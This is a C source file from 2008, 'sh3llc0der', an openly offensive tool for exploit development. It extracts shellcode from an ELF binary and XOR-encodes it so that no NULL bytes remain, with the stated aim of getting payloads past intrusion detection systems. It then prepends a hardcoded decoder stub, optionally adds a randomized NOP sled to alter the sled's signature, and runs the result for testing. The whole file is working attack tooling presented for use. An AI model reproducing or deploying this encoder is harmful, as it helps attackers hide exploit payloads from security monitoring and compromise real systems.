/* * sm4x - 2008 => sm4x0rcist [a7] gmail [d07] com * - sh3llc0der.c v0.1 (beta) * - (elf binary) shellcode encryptor, NULL free for IDS payload bypassing * - key is a simple int for x(x(p)) decryption(encryption(p)) (modify to add/subtract if needed) * - if you find bugs i dont wanna know -> fix them and its urs * - watch for 0x0a, 0x0d warnings for \r\n as they get mucked in most str** calls * * nb: nasm ur files with -felf, then ld -o them (u know) * usage: ./sh3llc0der [options] binaryfile * - output is a encoded byte array (or raw binary if -o <file> is specified) * - it was easier for me to write it directly hooking to the elf struct -> but you can change it (only took 3 hours so ITS BUGGY!) * */
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <time.h> #include <string.h> #include <linux/elf.h>
char decoder[] = "\xeb\x10\x5e\x31\xc9" "\xb1\x00\x80\x74\x0e" // \x00 location of payload size "\xff\x00\xfe\xc9\x75" // \x00 location of xor key "\xf7\xeb\x05\xe8\xeb" "\xff\xff\xff";
int getkey(int i) { int seed; struct timeval tm; gettimeofday(&tm, NULL); seed = tm.tv_sec + tm.tv_usec; srandom(seed); return (random() % i) +1; }
void usage() { printf("Usage: sh3llc0der [options] shellcode\n"); printf("\tv - verbose\n"); printf("\to [outfile] - out file (stdout is default)\n"); printf("\tn [size] - generate with NOP sled of size length (minus decoder)\n"); printf("\tr - randomize NOP sled with other operations\n"); printf("\t? - this crud\n"); }
int main(int argc, char **argv) { Elf32_Ehdr elfhdr; Elf32_Phdr dataseg; Elf32_Phdr txtseg;
int found_txt_seg = 0; int i = 0; int r = 0; int len = 0; int key = 0; int include_noop_instructions = 0; int noop_length = 0; int use_nop_randomization = 0; int write_file = 0; int is_verbose = 0; unsigned char c; unsigned char *b = NULL; unsigned char *nb = NULL; char *upayload = NULL; char *outfile = NULL; unsigned int payload_offset = 0; unsigned int payload_size = 0; int (*func)();
opterr = 0; int option = 1; while((option = getopt(argc, argv, "vrn:o:?")) != -1 ) { switch(option) { case 'v': is_verbose = 1; break; case 'o': write_file = 1; outfile = optarg; if(outfile != NULL) { printf("[+] writing shellcode to: %s\n", outfile); } break; case 'n': if(optarg != NULL) noop_length = atoi(optarg); else break; include_noop_instructions = 1; break; case 'r': use_nop_randomization = 1; break; case '?': usage(); exit(0); break; default: // nothing break; }; }
if(argc < 2) { usage(); exit(0); } printf("[+] sh3llc0der - sm4x 2008\n"); upayload = argv[argc-1]; if(upayload == outfile) { printf("[-] ummm no\n"); usage(); exit(-1); }
if(is_verbose) { printf("[?] opening %s\n", upayload); } FILE *p = fopen(upayload, "rb"); if(p == NULL) { printf("[-] null file - nice try\n"); exit(-1); } fseek(p, 0, SEEK_END); len = ftell(p); rewind(p); if(len <= 0) { printf("[-] 0 len file - nice try\n"); exit(-1); } /* adjust our noop length for the decoder size */ if(include_noop_instructions && noop_length > sizeof(decoder)) { noop_length -= sizeof(decoder); } printf("[+] shellcode length: %d Bytes\n", len);
b = (char *) malloc(sizeof(char)*len); if(b == NULL) { printf("[-] unable to buffer shellcode - nice try again!\n"); exit(-1); }
if(is_verbose) { printf("[?] reading %s....\n", upayload); } r = fread(b, 1, len, p); if(r != len) { printf("[-] **warning** - unable to load the entire file into buffer!\n"); } fclose(p); p = NULL; if(is_verbose) { printf("[?] file %s seems ok with %d size\n", upayload, len); }
/* get our ELF header out of the binary */ memcpy(&elfhdr, (void *)b, sizeof(Elf32_Ehdr));
printf("[+] Starting address: 0x%x\n", elfhdr.e_entry); /* seek to our offset */ printf("[+] Offset @ 0x%x\n", elfhdr.e_phoff);
/* loop for seg offset (you're gonna crash here if its not a proper elf binary -> don't really care!! lol) */ for(i = 0;i < elfhdr.e_phnum; i++) { /* copy in our txtseg what we think* to be the appropriate header (p_offset == 0 means text) */ memcpy(&txtseg, &b[(sizeof(Elf32_Ehdr)) + (i * sizeof(Elf32_Phdr))], sizeof(Elf32_Phdr)); if(txtseg.p_filesz > 0 && txtseg.p_offset == 0) { printf("[+] .text segment found, len: 0x%x|0x%x @ V:0x%x P:0x%x off: 0x%x\n", txtseg.p_filesz, txtseg.p_memsz, txtseg.p_vaddr, txtseg.p_vaddr, txtseg.p_offset); found_txt_seg = 1; break; } else { found_txt_seg = 0; } } if(!found_txt_seg) { printf("[-] could not find .text segment for encoding!\n"); exit(-1); }
/* calculations for start of .text with offset (usually 0) */ payload_size = (txtseg.p_vaddr + txtseg.p_filesz) - elfhdr.e_entry; payload_offset = (txtseg.p_offset + txtseg.p_filesz) - payload_size;
printf("[+] calc offset: 0x%x | 0x%x -> (SHELLCODE SIZE: %d Bytes)\n", payload_offset, payload_size, payload_size);
int new_payload_size = noop_length+payload_size+sizeof(decoder)-1;
nb = (char *) malloc(sizeof(char) * new_payload_size); if(nb == NULL) { printf("[-] error creating copy payload - nice try\n"); exit(-1); } memset(nb, 0x0, sizeof(char) * new_payload_size); // just in case - clean it out
// ensure we have a NULL free xor'd shellcode -> keep trying until we do int is_null = 0; int warn = 0; int attempts = 0; while(1) { if(attempts > 20) { printf("[-] somthing is very wrong!! please check the binary\n"); exit(-1); } key = getkey(255); for(i = 0; i < payload_size; i++) { c = b[payload_offset+i]; c ^= key; if(c == 0x00) { printf("[!] ERR: 0x%x on key: %d\n", b[payload_offset+i], key); is_null = 1; break; } if(c == 0x0a || c == 0x0d) { printf("[!] WARN: 0x%x on key: %d\n", b[payload_offset+i], key); warn =1; } } attempts++; if(is_null) { printf("[-] NULL found.. regenerating now... try=%d\n", attempts); is_null = 0; usleep(100); continue; } if(warn) { printf("[!] WARN: invalid hex was found in this shellcode -> this may* not pass some string functions!\n"); } if(is_verbose) { printf("[?] running xor-enc on payload now (key=%d @ %x attempts)...\n", key, attempts); }
/* fill our new buffer -nb*/ for(i = 0; i < payload_size; i++) { nb[noop_length+sizeof(decoder)-1+i] = b[payload_offset+i]; if(is_verbose) { printf("\\x%.2x", b[payload_offset+i]); } nb[noop_length+sizeof(decoder)-1+i] ^= key; } break; } if(is_verbose) { printf("\n"); } if(!warn) { printf("[+] done xor-enc on payload (NULL FREE)...\n"); } else { printf("[!] (check warnings!!) some problems with xor-enc (NULL FREE)...\n"); }
for(i = 0; i < noop_length+payload_size-1; i++) printf("\\x%.2x", nb[sizeof(decoder)+i]);
/* we need to set our primary instructions to decode with xor */ decoder[6] = payload_size; decoder[11] = key;
printf("\n"); if(include_noop_instructions) { printf("[+] prepending %d (%d = minus decoder len) NOOPs...\n", noop_length+sizeof(decoder), noop_length); // minus the decoder size if(use_nop_randomization) { for(i = 0; i < noop_length; i++) { int p = getkey(5); // hardly random - but change to modify the primary sled sig switch((int)p) { case 1: nb[i] = 0x90; break; case 2: nb[i] = 0x40; nb[i+1] = 0x48; i++; break; case 3: nb[i] = 0x50; break; case 4: nb[i] = 0x58; break; case 5: nb[i] = 0x99; break; default: nb[i] = 0x90; break; }; } } else { for(i = 0; i < noop_length; i++) nb[i] = 0x90; } }
printf("[+] adding decoder of %d Bytes (total= %d Bytes)...\n", sizeof(decoder), sizeof(decoder)+payload_size); memcpy(nb+noop_length, decoder, sizeof(decoder)-1); for(i = 0; i < noop_length+payload_size+sizeof(decoder)-1; i++) printf("\\x%.2x", nb[i]); printf("\n");
if(write_file) { printf("[+] writing payload to: %s\n", outfile); FILE *w = fopen(outfile, "wb"); if(w == NULL) { printf("[-] Unable to open file: %s\n", outfile); goto continue_test; } int bytes = fprintf(w, nb, sizeof(decoder)+payload_size, 0); fclose(w); printf("[+] done %d written.\n", bytes); }
continue_test: printf("[+] testing payload now ...\n"); printf("[-] if shellcode tests bad something has gone horribly wrong - do NOT continue with payload...\n");
/* if this mashes out ie: seg fault -> then DO NOT use the shellcode on an exploit -> ur gonna crash the shit */ func = (int (*)()) nb; (int)(*func)();
// should never get here really
cleanup: if(p != NULL) fclose(p); return 0; }